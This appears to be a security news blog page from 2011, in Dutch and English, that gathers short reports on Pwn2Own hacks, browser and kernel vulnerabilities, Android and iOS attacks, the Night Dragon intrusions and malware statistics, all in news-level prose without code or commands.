  • Adobe waarschuwt voor een ernstig beveiligingslek in Flash Player en Adobe Reader, waardoor bijna twee miljard internetgebruikers risico lopen. De kwetsbaarheid wordt actief bij gerichte aanvallen gebruikt en geeft aanvallers volledige controle over het systeem. Het lek is aanwezig in de Windows, Macintosh, Linux, Solaris en Android-versies van Flash Player, dat op 99% van alle systemen wereldwijd is geïnstalleerd.
  • Check out wat deze hacker doet op Times Square met behulp van een iPhone, een aantal zelfgemaakte gadgets, en een nieuwsgierige geest.

  • car-computer-hackedOnderzoekers van twee universteiten hebben een manier gevonden om een auto te hacken door middel van een Trojaans paard, dat verstopt zit in een liedje dat via de autoradio kan worden afgespeeld. De hack kan niet makkelijk worden uitgevoerd.

    De onderzoekers van de Amerikaanse universteiten van Californië en Washington plaatsten een verborgen code in een liedje, dat via een gebrande cd op een autoradio kan worden afgespeeld, meldt IT World. De code installeert een achterdeur in de software van de stereo-installatie. Door gebruik te maken van die achterdeur, konden de onderzoekers allerlei andere zaken veranderen in de software van de boordcomputer van de auto.

    Het audiobestand zou kunnen worden verspreid via nieuwsgroepen en p2p-netwerken, waar het niet op zou vallen, claimt onderzoeker Stefan Savage. "Het is moeilijk om iets onschuldigers te vinden dan een liedje." Desondanks is het risico klein: de software van auto's verschilt per merk, per model en zelfs per uitvoering, waardoor hacks op maar weinig auto's werken. Bovendien moet de autobezitter het liedje downloaden, op cd branden en afspelen in de auto.

    De onderzoekers hebben niet bekendgemaakt om welk model auto het ging in het onderzoek. Zij achten de risico's van misbruik op lange termijn eveneens klein. "Het is niet waarschijnlijk dat car hacking veel gaat voorkomen in de toekomst", aldus onderzoeker Tadayoshi Kohno, die meegewerkt heeft aan het project. Er waren ook nog andere manieren dan via een audiobestand, zoals via bluetooth en draadloze netwerken, maar de makkelijkste manier om exploits van autosoftware te misbruiken bleek een eerder ontdekte methode via het aansluiten op een laptop.

    De hack met de laptop werkt via de can-bus om toegang te krijgen tot het elektronische systeem van de testwagen. Can is een protocol dat speciaal is ontwikkeld voor het gebruik in auto's en autofabrikanten zijn sinds een aantal jaren verplicht deze te gebruiken. De onderzoekers sloten een laptop aan op het controlesysteem van de auto en draaiden een zelf geschreven packet sniffer om de verstuurde gegevens te analyseren. Hierna vonden ze een manier om zelf pakketjes te injecteren en zo bepaalde functionaliteit van het systeem over te nemen. In een test die ze eind 2009 uitvoerden, konden ze controle krijgen over de motor, de remmen, de vergrendeling en de snelheidsmeter van een testwagen.

    Bron: tweakers.net

  • iphone-4-pwned

    Earlier today we mentioned that the iOS hacker, i0n1c, stated that he was going to wait until iOS 4.3.1 to release his jailbreak. This comes in wake of the events that took place in Canada at this years Pwn2Own contest. Of large interest to hackers and corporations alike, thousands turn out to witness the latest in cyber security fraud.

    The name of the game is Pwn2Own, meaning if you are the fastest to hack it, you get it. These devices range from Blackberrys and iPhones, to MacBooks and laptops. Google was even on hand with a $20,000 reward to anyone who could hack their Chrome software. But day 2 was all about the iPhone 4, and was once again exploited by security expert, Charlie Miller…

     

    Done through Safari, the exploit targets the iPhone 4 with a rigged website. Miller’s first attempt at the hack failed, causing the iPhone browser to crash. But once it was relaunched, Charlie was able to hijack the entire address book.

    It is important to note that the iPhone 4 was running firmware 4.2.1, since 4.3 just went live this week. Although Miller’s Safari exploit still exists in 4.3, Apple’s new ASLR feature would have to be bypassed to make it work. This new layer of security seems to have hackers a bit baffled.

    But the day belongs to Charlie Miller, and wherever he is with his new iPhone 4 and $15,000 prize money, we salute him.

    source: iphonedownloadblog.com

     

  • pwn2ownPwn2Own is een jaarlijks terugkerende hackerwedstrijd (2011 voor de 5e maal) die tijdens de CanSec West beveiligingsconferentie plaatsvindt. Onderzoekers krijgen drie dagen de tijd om verschillende browsers en smartphones te hacken, om zo een geldbedrag en hardware te winnen.

    Macbook binnen 5 seconden gehackt

    Franse beveiligingsonderzoekers hebben tijdens de Pwn2Own hackerwedstrijd een Macbook met Mac OS X 64-bit binnen vijf seconden gehackt. Ook Internet Explorer 8 op een 64-bit versie van Windows 7 met Service Pack 1 sneuvelde. Apple had net voor het begin van de wedstrijd Safari 5.0.4 en iOS 4.3 uitgebracht, waardoor sommige exploits niet meer werkten. De Franse hackers gebruikten een lek in Safari om volledige controle over het besturingssysteem te krijgen. Het ging om een volledig gepatchte versie van Mac OS X. Als beloning ontvangen de onderzoekers 15.000 dollar en een Apple MacBook Air met Mac OS X Snow Leopard.

    Volgens de Fransen was de exploit vanwege het gebrek aan documentatie over 64-bit Mac OS X hacking een zware opgave. Daarnaast was het maken van een betrouwbare exploit lastiger dan het vinden van het lek in kwestie.  

    Internet Explorer

    Windows 7 SP1 sneuvelde via drie verschillende beveiligingslekken. De aanval omzeilde DEP (data execution prevention) en ASLR (address space layout randomization), twee belangrijke beveiligingsmaatregelen in Windows. "Ik moest meerdere beveiligingslekken aan elkaar koppelen om het betrouwbaar te laten werken", zegt Stephen Fewer van Metasploit. Hij gebruikte twee zero-day beveiligingslekken en koppelde vervolgens een derde lek aan de aanval om uit de Protected Mode sandbox van IE te ontsnappen. Fewer won voor zijn werk 15.000 dollar en een Windows laptop.

    De Nederlandse beveiligingsonderzoeker en jurylid Peter Vreugdenhil laat weten dat het kraken van de Protected Mode erg indrukwekkend is, omdat het niet eenvoudig te omzeilen is. Mede omdat er slechts één beschreven manier is.

    Uniek lek plaagt IE, Firefox en Safari

    Het komt niet vaak voor dat drie verschillende browsers met hetzelfde beveiligingslek te maken hebben. Google onderzoeker Chris Evans ontdekte een probleem in Firefox, Internet Explorer en Safari waardoor een aanvaller informatie zou kunnen stelen. De bug is niet vrij ernstig merkt Evans op, maar zou in combinatie met een ander lek gebruikt kunnen worden.

    "Het is een bijzondere en unieke gelegenheid om de reacties en reactietijden van de leveranciers voor een bijna identiek lek te vergelijken. Het mooie is dat dit een niet zo ernstig probleem is, aangezien leveranciers ernstige lekken vaak eerder oppakken. Minder ernstige problemen zijn daarom beter geschikt als meetlat." Evans heeft er een soort wedstrijd van gemaakt om te zien welke leverancier als eerste het probleem oplost.

    Google Chrome overleeft eerste dag hackerwedstrijd

    Ondanks een beloning van 20.000 dollar zijn hackers er niet in geslaagd Google Chrome op de eerste dag van de Pwn2Own hackerwedstrijd te kraken. De zoekgigant had een beloning van 20.000 dollar uitgeloofd voor de onderzoeker die Chrome op de eerste dag zou hacken, maar niemand ging op het aanbod in. Er hadden zich twee deelnemers voor de browser ingeschreven, maar de eerste kwam niet opdagen en de tweede wilde zich liever op de BlackBerry exploit richten. Het aanvallen van de smartphone staat voor vandaag gepland.

    Onderzoekers hebben vandaag en morgen nog de tijd om Google Chrome te hacken, en krijgen daarbij ook meer mogelijkheden. De beloning zal echter lager liggen. Mocht Chrome de hackerwedstrijd overleven, dan is het de derde keer op rij.

    IE9 immuun voor IE8 zero-day lekken

    De nieuwe kwetsbaarheden waarmee Internet Explorer 8 tijdens de Pwn2Own hackerwedstrijd werd gekraakt zitten niet in Internet Explorer 9, zo heeft Microsoft laten weten.

    Internet Explorer 8 werd gehackt door Metasploit-ontwikkelaar Stephen Fewer, die via drie nieuwe beveiligingslekken volledige controle over het onderliggende Windows 7 SP1 64-bit systeem kreeg. Volgens Microsoft zitten de kwetsbaarheden niet in de Release Candidate van de nieuwste IE-versie, waarvan de uiteindelijke versie aanstaande maandag verschijnt.

    Naast Internet Explorer 8 werd ook Safari op Mac OS X 64-bit gehackt. Google Chrome overleefde de eerste dag van de hackerwedstrijd.
  • google_music_storeAndroid hackers have discovered that Google's cloud-based music service is up and running, for those prepared to muck about with the internals of Honeycomb at least.

    Google has been widely expected to launch a cloud-based music service – an online store of your existing collection – and that‘s exactly what's been found in the Honeycomb media player.

    Those willing to install the latest build, which isn't yet supported by Google, have been able to synchronise their music collections with Google's cloud and then stream the tracks back after deleting the local files.

    That is of limited value of course, it only frees up some space on the phone, and Google‘s system will no doubt come with a desktop client too, so that music synchronised to the cloud can be accessed by different devices.

    This approach has been tried before, with service providers arguing that they don't need to worry about copyright as Fair Use provisions allow owners to make copies of purchased music, and the fact that those copies happen to be located in the cloud is irrelevant. The record labels haven't, in the past, been sympathetic to such arguments, which don't apply in the UK anyway as we have no provision for fair use.

    The hack has been repeated by others on the XDA Developers' Forum, several of whom report being able to stream music reliably from Google's cloud into handsets with Gingerbread installed.

    Building synchronisation into the Gingerbread media player shows Google's commitment to provide such a service, but it's hard to imagine the copyright holders are going to take this lying down.

    Google has shown itself willing to ride roughshod over such interests in the past, and will no doubt be equal to the task this time around too. ®

  • pwn2ownThe 5th annual Pwn2Own zero-day competition starts tomorrow, and hackers are preparing to cash in on huge prize pool of tech and cold hard cash. Last year the main focus was on web browser and mobile devices, and to be honest nothing has changed for Pwn2Own 2011. As some of the best brains in the world of security exploits bang heads in Vancouver, all the major browser and smartphone developers will be watching closely and anxiously as what the organisers refer to as “the current security posture” of their products is scrutinised and in all likelihood broken apart. Last year we witnessed three out of the four leading web browsers and the iPhone all successfully compromised.

     Across March 9th, 10th and 11th a total cash pool of some $125,000 (£77,400) and a bunch of hardware spot prizes including an Apple MacBook Air 13″, Google Nexus S smartphone, powered Dell Venue Pro will be up for grabs. Perhaps the most intriguing of all being the $20,000 (£12,400) up for grabs from Google itself should anyone be able to escape the Google Chrome browser sandbox and compromise a Windows 7 PC with the aid of nothing other than vulnerabilities exclusively within the Google-code. Google has good reason to make such a generous prize available: Chrome was the only mainstream browser involved in Pwn2Own 2010 which escaped unscathed. Apple Safari, Microsoft Internet Explorer and Mozilla Firefox were less fortunate last year, and are not expected to survive this year either. But then again, Chrome will do well to stand up against the pressure that comes with the publicity anyone who is successful in their hacking attempt will get. Forget the $20,000 cash, it’s the kudos that these guys will want and will have been working hard to attain.

    Browser vendors know this, and both Mozilla and Google have already released major security patches to shore things up as best they can before Pwn2Own starts, although they would probably both deny that the timing of those updates is anything but coincidence. Yet Firefox 3.6.14 and Google Chrome 9.0.597.107 have both arrived in the week before Pwn2Own and patching vulnerabilities which could conceivably have helped the hackers in their efforts. Apple has released an update to iTunes which patches a reported 50 vulnerabilities in the WebKit rendering engine that drives Safari, but Microsoft has decided to stand alone and make no special out-of-band patch preparations for Pwn2Own 2011. The last updates to Internet Explorer happened, as scheduled, on February 8th.

    As far as the mobile device hacking front goes, Pwn2Own 2011 sees the Dell Venue Pro (Windows 7 Mobile), Apple iPhone 4 (iOS), BlackBerry Torch 9800 (BlackBerry 6) and a Google Nexus S (Android) all being subject to hacker attack. To be successful, a hacker must compromise ‘useful data’ from the phone but with minimal user interaction. Attacks against the phone baseband are allowed this year for the first time, which should liven things up a bit.

    One thing is for sure, it’s going to be an interesting week ahead for security watchers…

    Source: itpro.co.uk

  • Een beveiligingsonderzoeker die een ernstig lek in de Android Marktplaats had gevonden, heeft zelf 11.000 euro weggegooid door de kwetsbaarheid aan Google te verklappen. Jon Oberheide had met zijn cross-site scripting-lek aan de Pwn2Own-hack mee willen doen, maar dacht dat het probleem niet aan de wedstrijdregels voldeed. Daarop besloot hij Google te informeren, die hem via het beloningsprogramma voor onderzoekers met 1.337 dollar beloonde.

    Nu blijkt dat Oberheide toch aan de wedstrijd mee had mogen doen, wat hem 11.000 euro en een Android telefoon had kunnen opleveren. "Ik ben teleurgesteld, omdat ik dacht dat het erg grappig zou zijn om Pwn2Own met een XSS-lek te winnen", aldus de onderzoeker. De kwetsbaarheid zorgde ervoor dat het XSS-lek willekeurige code op de telefoon kon installeren als de gebruiker op zijn Gmail-account was ingelogd en via de browser een kwaadaardige link opende.

    "Het surfen op de Android Marktplaats via je browser op je desktop en het sturen van applicaties naar je toestel is fantastisch voor de gebruikerservaring, maar het opent een gevaarlijke aanvalsvector. Elk willekeurige XSS-lek in de Marktplaats laat een aanvaller je browser een POST request maken dat voor de installatie van een app op je telefoon zorgt," laat Oberheide weten. Inmiddels is het lek door Google gepatcht.
  • Ellinux_usb_3.0_newsen beveiligingsonderzoeker heeft een bug gevonden in de Caiaq-usb-driver, die breed wordt toegepast in de Linux-kernel. De bug kan worden misbruikt om na het creëren van een buffer-overflow toegang te krijgen tot een Linux-machine.

    Volgens Rafael Dominguez Vega van MRW InfoSecurity gaat het fout als de Caiaq-usb-driver via het strcpy-commando de naam van een aangesloten usb-apparaat wil uitlezen. De strcpy-opdracht controleert niet de lengte van een usb device name, waardoor het gereserveerde geheugengebied van tachtig bytes kan worden doorbroken en een buffer overflow ontstaat.

    Door een usb-apparaat te voorzien van een extra lange apparaatnaam is het mogelijk om een buffer-overflow te creëren, waarna code geïnjecteerd en aangezet kan worden. Vega stelt dat hij erin is geslaagd om een usb-apparaat in elkaar te zetten waarmee het mogelijk is om toegang te krijgen tot een Linux-systeem, een aanvalsmethode die hij op Twitter kwalificeert als 'Linux plug&pwn'.

    Het onveilige strcpy-commando werd pas in februari vervangen door het veiligere strlcpy-commando in de Linux-kernel. Strlcpy controleert de lengte van een string, in dit geval het apparaatbeschrijvingsveld van een usb-device. Desondanks zouden er nog talloze kwetsbare Linux-kernels in omloop zijn, mede doordat vrijwel alle distro's gebruikmaken van de Caiaq-usb-driver. Hierdoor bestaat het risico op aanvallen, al is fysieke toegang tot een usb-poort van een server of pc noodzakelijk.

    De usb-aanvalsmethode is niet geheel nieuw voor het Linux-besturingssysteem; in februari demonstreerde een onderzoeker een hack waarbij via een usb-stick toegang werd verkregen tot gebruikersdata in een Ubuntu-systeem.

    bron: tweakers.net

  • voip_server_visualizing
    Through our support of the Honeynet Project, we recently attempted a new approach to visualizing attacks on their VOIP honeypots.

    With the increase in popularity of VOIP telephony, attacks are becoming more prevalent. The compromise of a VOIP system can cost the victim over $100,000 in real cash. For example, an Australian based company suffered $120,000 in toll fraud as a result of a VOIP compromise - read the full story here.

    The video is intended to be a high level (if not stylized) visualization of the early stages of a cyber criminal compromising a VOIP system.
    Credit to gltail, a ruby based tool which we fed heavily hacked/modified logfiles. Also Johann Pachelbel for his beautiful Canon as I was so tired of hearing electronic dance music mixed to hacking videos.
    Source: Vimeo.com
  • GFI Software has announced the top 10 most prevalent malware threats for the month of February 2011 as detected by scans performed by its anti-malware solution, VIPRE Antivirus, and its antispyware tool, CounterSpy.

    According to GFI Software, a trend observed since last summer continued, with many of the same types of Trojan horses continuing to dominate the threat landscape. GFI’s statistics revealed that Trojans made up six of the top 10 malware threats in February 2011. Topping the list, Trojans detected asTrojan.Win32.Generic!BT accounted for 22.97 percent of total detections, holding its spot as the number one threat.

    These Trojans are downloaders associated with rogue security programs known as Fake Antivirus software, sometimes referred to as “scareware”. Once they are on a user’s system, these programs perform a fake scan of a victim’s computer for malware then display false warnings that the machine is infected in an attempt to convince victims to purchase fake security software.

    Top 10 Detections for February 2011 as reported by GFI Software:

    Detection Type Percent

    1. Trojan.Win32.Generic!BT Trojan 22.97%

    2. Trojan-Spy.Win32.Zbot.gen Trojan 3.46%

    3. Trojan.Win32.Generic.pak!cobra Trojan 2.89%

    4. Zugo LTD (v) Adware 2.52%

    5. Fraudtool.Win32.Securityshield.ek!c (v) Trojan 2.00%

    6. Trojan.Win32.Generic!SB.0 Trojan 1.72%

    7. INF.Autorun (v) Trojan 1.66%

    8. Worm.Win32.Downad.Gen (v) Worm 1.48%

    9. Pinball Corporation (v) Adware 1.19%

    10. Exploit.PDF-JS.Gen (v) PDF exploit0.83%

    The top 10 results represent the number of times a particular malware infection was detected during GFI’s VIPRE and CounterSpy scans that report back to GFI’s community of opt-in users. These threats are classified as moderate to severe based on method of installation among other criteria established by GFI Labs.


    Source: securityweek.com

  • firefoxMozilla heeft voor de tweede keer deze week een update voor Firefox uitgebracht, die een fout in de vorige patch verhelpt. Woensdag verscheen Firefox 3.6.14, waarin 11 beveiligingslekken werden verholpen. De update zorgde ervoor dat sommige Java applets niet meer werkten, waarop nu versie 3.6.15 is uitgekomen.

    Ondanks het feit dat de browser zelf zegt dat er een "beveiligings- en stabiliteitsupdate" beschikbaar is, lost 3.6.15 geen beveiligingsproblemen op. Updaten kan via Mozilla.com of de browser.

    Naast Firefox is er ook een tweede patch voor Thunderbird verschenen. Deze versie verhelpt een crash na het updaten waar sommige gebruikers mee te maken hadden.

    bron: security.nl
  • Attack Surface Analyzer is developed by the Security Engineering group, building on the work of our Security Science team. It is the same tool used by Microsoft’s internal product groups to catalogue changes made to operating system attack surface by the installation of new software.

    Attack Surface Analyzer takes a snapshot of your system state before and after the installation of product(s) and displays the changes to a number of key elements of the Windows attack surface.

    This allows:

    • Developers to view changes in the attack surface resulting from the introduction of their code on to the Windows platform
    • IT Professionals to assess the aggregate Attack Surface change by the installation of an organization’s line of business applications
    • IT Security Auditors evaluate the risk of a particular piece of software installed on the Windows platform during threat risk reviews
    • IT Security Incident Responders to gain a better understanding of the state of a systems security during investigations (if a baseline scan was taken of the system during the deployment phase)

    System Requirements

    Supported Operating Systems:Windows 7;Windows Server 2008;Windows Vista

    Collection of Attack Surface data: Windows 7, Windows Vista, Windows Server 2008 R1 or Windows Server 2008 R2

    Analysis of Attack Surface data and report generation: Windows 7 or Windows Server 2008 R2 with Microsoft .Net 3.5 SP1

    You can download Attack Surface Analyzer here:

    64-bitAttack_Surface_Analyzer_BETA_x64.msi
    32-bitAttack_Surface_Analyzer_BETA_x86.msi

    Or read more here.

  • In januari van dit jaar vierde het computervirus zijn 25e verjaardag, reden voor de Finse virusonderzoeker Mikko Hypponen om de twee auteurs op te zoeken. Brain verspreidde zich via 5,25 en was het eerste pc virus. Hypponen reisde af naar Lahore in Pakistan om Basit en Amjad te interviewen. De twee virusschrijvers hebben nooit eerder een interview gegeven over het fenomeen dat ze zijn begonnen.

    Hypponen merkt op dat het schrijven van malware in 1986 niet strafbaar was en verschilt van de malware die vandaag de dag in omloop is. Binnenkort verschijnt het interview online, zo blijkt uit onderstaande trailer.

    Bron: security.nl

  • Deze video geeft een demonstratie hoe je in een flashgame je scores kan aanpassen.

  • Aanvallers gebruikers een nieuwe manier om vertrouwelijke gegevens van internetgebruikers te stelen. Daarvoor waarschuwt beveiligingsbedrijf Imperva. Het gaat om een vereenvoudigde versie van de Man-in-the-Browser-aanval, genaamd Boy-in-the-Browser. De aanval wordt niet alleen voor internetbankieren, maar ook andere applicaties gebruikt.

    De aanval gebruikt exploitcode om toegang tot het systeem van het slachtoffer te krijgen en wijzigt daar het HOSTS-bestand. Hierdoor wordt het slachtoffer naar een andere website doorgestuurd, ook al tikt hij zelf het adres in de adresbalk in. Vervolgens wordt de exploitcode van het systeem verwijderd, wat detectie voor virusscanners moet bemoeilijken.

    Virusscanner
    In tegenstelling tot een Man-in-the-Browser, is een Boy-in-the-Browser eenvoudig uit te voeren eneffectief voor kleinschalige operaties. De aanval is zeer lastig door consumenten te herkennen en moeilijk door virusscanners te voorkomen. Vanwege de eenvoud van de code kunnen de makers zeer snel nieuwe varianten uitbrengen. "Tegen de tijd dat signatures voor virusscanner beschikbaar zijn, staat de exploitcode niet meer op de machine", aldus Imperva.

    De beveiliger waarschuwt dat vanwege de lage kosten van een Boy-in-the-Browser, aanvallers ze voor allerlei doelwitten kunnen gebruiken. "Het vermijden van infecties door dit soort Proxy Trojans is naar verluid de verantwoordelijkheid van consumenten, deze aanvallen worden echter een steeds groter probleem voor online service providers."

    Bron: Security.nl
  • Gegevens die via de Android-apps voor Facebook, Twitter of Google Calendar over het internet worden verstuurd, worden niet versleuteld, ontdekte een Amerikaanse hoogleraar. Op publieke wifi-hotspots is dat een risico.

    Gebrek aan sslDan Wallach, universitair hoofddocent computerwetenschappen in Houston, ontdekte dat bepaalde Android-apps gegevens onversleuteld verzenden. De ontdekking werd gedaan toen Wallach tijdens zijn lessen netwerkverkeer van en naar een Android-telefoon liet sniffen met Wireshark en de tcp/udp-proxy Mallory.

    Daarbij bleken de sociale-netwerkapps onbeveiligd gegevens te versturen. Het is nog onbekend of het bij Twitter enkel om de officiële client gaat of om alle apps die de Twitter-api gebruiken. In het geval van Twitter betekende het gebrek aan versleuteling dat alle verzonden tweets konden worden bekeken; dat zou bij privéberichten een privacyprobleem kunnen opleveren. Omdat Twitter gebruikmaakt van oauth was login-informatie niet te achterhalen.

    Het is onduidelijk of dat bij Facebook wel kan; die app gebruikt in ieder geval geen oauth. Opvallend genoeg werd een instelling in de smartphone van de hoogleraar, waardoor al het netwerkverkeer met ssl zou moeten worden versleuteld, genegeerd. Ook Google Calendar synchroniseerde zijn gegevens zonder encryptie; Google Voice- en Gmail-gegevens werden weer wel versleuteld. Het gebrek aan een beveiligde verbinding maakt dat gegevens op publieke wifi-hotspots kunnen worden afgeluisterd. Ook bestaat het gevaar van man in the middle-aanvallen.

    bron: tweakers.net

  • This post will serve tohacker collect new attack techniques as they are published. If you think something should be added, please comment below and I'll add them.

    "Every year the Web security community produces a stunning amount of new hacking techniques published in various white papers, blog posts, magazine articles, mailing list emails, etc. Within the thousands of pages are the latest ways to attack websites, Web browsers, Web proxies, and so on. Beyond individual vulnerability instances with CVE numbers or system compromises, we're talking about actual new and creative methods of Web-based attack. The Top Ten Web Hacking Techniques list encourages information sharing, provides a centralized knowledge-base, and recognizes researchers who contribute excellent work."

    Current 2011 List

    1. Bypassing Flash’s local-with-filesystem Sandbox
    2. Abusing HTTP Status Codes to Expose Private Information
    3. SpyTunes: Find out what iTunes music someone else has
    4. CSRF: Flash + 307 redirect = Game Over


    Previous Winners
    2010 - 'Padding Oracle' Crypto Attack
    2009 - Creating a rogue CA certificate
    2008 - GIFAR
    2007 - XSS Vulnerabilities in Common Shockwave Flash Files
    2006 - Web Browser Intranet Hacking / Port Scanning

    Source: jeremiahgrossman.blogspot.com

  • A new Android Trojan - dubbed HongTouTou or ADRD - has been spotted targeting Chinese-speaking users.

    Repackaged with popular Android applications and games, it is being distributed via unregulated app markets and online forums.

    "When an app containing HongTouTou starts, it sends encrypted data containing the device IMEI and the IMSI to a remote host," explains Lookout's Tim Strazzere. "In response, the HongTouTou receives a set of search engine target URIs and a set of search keywords to send as queries."

    Once it has submitted the queries to a search engine and has received the results, it clicks on specific ones. To the search engine, this looks like normal user behavior.

    According to Strazzere, it can also process a command instructing it to download an Android package file which can monitor SMS conversations and insert content related to specific keywords (potentially spam) into them.

    A number of security firms have already analyzed the Trojan and some of them classified it as a variant of Geinimi. But, F-Secure researchers think otherwise: "From our point of view, Geinimi and Adrd differ due to the fact that Geinimi can be classified as a a classic Backdoor for its vast command and control commands, whereas Adrd can be classified as a classic Trojan-Clicker."

    Source: helpnetsecurity.com

  • motorola_atrix_338Het is hackers gelukt root-toegang te krijgen op Motorola's Atrix 4G-smartphone. Het root-account geeft gebruikers meer rechten, wat de mogelijkheden tot tweaken bevordert. Het toestel ligt pas over enkele dagen in de winkels.

    Nog voor Motorola's nieuwste Android-smartphone in de winkels ligt, is het leden van het xda-forum al gelukt om root-toegang op het toestel te verkrijgen. Een gebruiker die het toestel vroegtijdig wist te bemachtigen maakte een dump van de systeembestanden, waarna romontwikkelaar designgears het root-account wist te ontsluiten. Gebruikers kunnen met root-toegang bepaalde applicaties draaien die meer rechten vereisen dan Android standaard biedt.

    De Android-toestellen van Motorola hebben de reputatie moeilijk te hacken te zijn. Dit komt omdat de fabrikant de bootloaders op veel van zijn smartphones versleutelt, waardoor het onmogelijk is om zelf kernels te compileren en deze te flashen. In het verleden zijn pogingen gedaan deze versleuteling met een brute force-methode te kraken, zonder succesvol resultaat. Of de bootloader van de Atrix 4G ook een versleuteling bevat, is nog niet bekend. Er is een kans dat Motorola met zijn nieuwe telefoons voor een andere aanpak omtrent zijn bootloaders kiest; vorige maand liet het via Facebook weten dat het op zoek is naar een oplossing om softwareontwikkelaars tegemoet te komen.

    De Atrix 4G ligt in Amerika op 22 februari in de winkels, en is gekoppeld aan de provider AT&T. Het Android-toestel gooide hoge open op de CES en het MWC, vanwege de accessoires die Motorola aanbiedt. Het bedrijf levert een speciale laptopbehuizing waar het toestel ingeschoven kan worden, waarna de interface zich aanpast aan het 11,5"-scherm. Daarnaast is ook nog een multimedia-dock beschikbaar. Of het toestel ook naar Nederland komt is nog niet bekend.

    Bron: tweakers.net

  • Wondering how secure your browser is? Today at the RSA Conference in San Francisco, Qualys CTO Wolfgang Kandek presented their research which clearly shows that browser security is alarmingly bad.

    Results show that browsers and plug-ins are frequently outdated and easily attackable. To make things worse, malware authors adapt quickly and most of their new attacks are against browser plug-ins.

     

    java_chart

    Data was gathered by Qualys BrowserCheck, a tool that scans your browser looking for potential vulnerabilities and security holes in your browser and its plug-ins.

    Around 200,000 people took the test in the past six months, with the top users being from the United States, Brazil and Germany. As browser popularity goes, Internet Explorer usage is big in the U.S., while Firefox dominates in Europe.

    Even though browser patching is very established and user awareness is growing, the basic data shows that roughly 70% of all BrowserCheck users were using a vulnerable browser.

    Detailed analysis of the data showed that only about 20% of security vulnerabilities are in the browsers and the great majority of security issues comes from the plug-ins installed in them. These plug-ins are typically not updated by the browser. Top examples are Adobe Flash and Reader, Sun Java and Windows Media Player.

    While everybody knows about the hackers' predilection for targeting Adobe Flash, data shows that Sun Java is by far the most vulnerable plug-in installed in browsers. "While Adobe has been evidently stepping up their security efforts, we still haven't seen the same from Sun," commented Kandek.

     

    java_chart2

    The simplest advice for end users would be to take a look at BrowserCheck and make sure their browsers and plug-ins are updated.

    IT departments should try to follow patching cycles - it's the least they can do in order to be safe. This naturally won't protect them from targeted attacks, but it will at least keep those using automated tools at arm's length.


    Source: HelpNetSecurity

  • Nieuwe en traditionele manieren om netwerkbeveiliging te omzeilen, de zogenaamde 'advanced evasion techniques', zijn nog steeds een groot probleem. Ze worden niet goed opgelost door fabrikanten van netwerkapparatuur, waardoor bedrijven risico lopen. Dit zeggen onderzoekers van het Finse onderzoeksbedrijf Stonesoft. Zij vonden vanaf oktober 2010 welgeteld 124 nieuwe 'advanced evasion techniques' en hebben deze gerapporteerd aan het Finse CERT. De eerste 23 gevallen die gemeld werden aan CERT-FI, zijn openbaar gemaakt.

    Hoewel veel fabrikanten claimen de problemen met de 'advanced evasion techniques' te hebben opgelost, toont onderzoek van Stonesoft aan dat deze nog wel degelijk door de systemen heen weten te komen. Met kleine aanpassingen, zoals het veranderen van de byte-grootte, en 'segmentation offset', omzeilen de technieken het detectiesysteem van de apparaten.

    "Het lijkt erop dat fabrikanten die beweren 100% beveiligd zijn tegen 'advanced evasion techniques', zich niet bewust zijn van de omvang van het probleem. Noch hebben zij voldoende gedaan om dit probleem te onderzoeken. Tot nog toe zijn de ontdekkingen het topje van de ijsberg", aldus Joona Airamo, topman van Stonesoft.
  • iphonedeathLosing your iPhone or iPad equals having your passwords compromised - even if the device is protected with a passcode.

    The results of an experiment conducted by Jens Heider and Matthias Boll, two researchers from the Fraunhofer Institute for Secure Information Technology, have proven that the combination of a modified jailbreaking technique and the installation of an SSH server on a device running iOS results in a complete circumvention of the passcode.
    lost-pass-keychain-ios

    According to the researchers, this is not the first time that someone managed to access great portions of the data stored in these devices without having to know the passcode. "Tools are available for this tasks that require only small effort. This is done by tricking the operating system to decrypt the file system on behalf of the attacker. This decryption is possible, since on current iOS devices the required cryptographic key does not depend on the user’s secret passcode," they explain.

    So, they chose to concentrate their efforts on gaining access to the data stored in the keychain, which usually contains various user accounts and passwords for e-mail, VPN, WiFi, various websites and sometimes also passwords and certificates used in 3rd party applications.

    This data is also encrypted, and for the sake of the experiment, they assumed the device is in the hands of a thief or someone who found it, that it is protected by a strong passcode and that it's not jailbroken.

    After having bypassed the passcode using the previously mentioned procedure, software on the device can be used to access the encrypted keychain database. A specially crafted script is then copied into the device via the SSH connection and, when executed, it reveals information concerning the found accounts in the shell screen.

    The script decrypts the keychain with the help of functions provided by the operating system itself, but there are some passwords that remain protected and inaccessible, and some that can only be accessed if the attacker knows the passcode:


    "We judge the effort for the shown attack method as low, since the used jailbreaking tools are freely available and the additional steps to decrypt the keychain requires only moderate programming skills," conclude the researchers, and advise everyone who lost their iPhone or iPad or had it stolen to immediately change all the passwords stored on it.


  • Tal van energiebedrijven zijn de afgelopen jaren het doelwit van cyberaanvallen geworden, afkomstig uit China. McAfee waarschuwt vandaag voor Operatie Night Dragon, een verzameling van aanvallen die in november 2009 begonnen en verschillende globale olie-, petrochemische- en energiebedrijven als doelwit hadden. Het was de aanvallers te doen om informatie over projectfinancieringen en biedingen voor olie- en gasvelden. "Deze informatie is zeer gevoelig en kunnen miljardendeals in deze zeer competitieve industrie breken of maken", zegt CTO George Kurtz.

    De aanvallers gebruikten traditionele aanvalsmethoden, zoals social engineering, spear-phishing, Windows exploits, Active Directory hacks en remote administration tools (RATs). McAfee omschrijft de in de aanvallen gebruikte tools, technieken en netwerkactiviteiten als Night Dragon. De aanvallen, die voornamelijk vanuit China worden gelanceerd, vinden nog steeds plaats.

    China
    Bij sommige aanvallen werd de extranet webserver via SQL-injectie gecompromitteerd. Vervolgens werd er aanvullende malware geüpload, waardoor de aanvallers toegang tot het intranet, belangrijke desktops en servers kregen. Via wachtwoordkrakers en 'pass-the-hash tools' werden aanvullende gebruikersnamen en wachtwoorden buitgemaakt. Voor de aanvallen gebruikten de aanvallers gehuurde servers in de Verenigde Staten en gehackte servers in Nederland. Naast energiebedrijven waren ook individuen en topbestuurders in Kazachstan, Taiwan, Griekenland en de VS het doelwit.

    Volgens McAfee zijn verschillende partijen bij de aanvallen betrokken, maar heeft het één individu weten te identificeren. Deze persoon uit Heze in de Chinese Shandong provincie, zou waardevolle informatie over de Command & Control infrastructuur aan de aanvallers hebben doorgespeeld. De virusbestrijder denkt niet dat dit individu het meesterbrein achter de aanvallen is, toch zou hij of zij tenminste een deel van de aanvallers kunnen identificeren.

    Bron: security.nl

  • This episode of the OWASP appsec tutorial series describes the #1 attack on the OWASP top 10 - injection attacks.
    The video illustrates SQL injection, discusses other injection attacks, covers basic fixes, and then recommends resources for further learning.


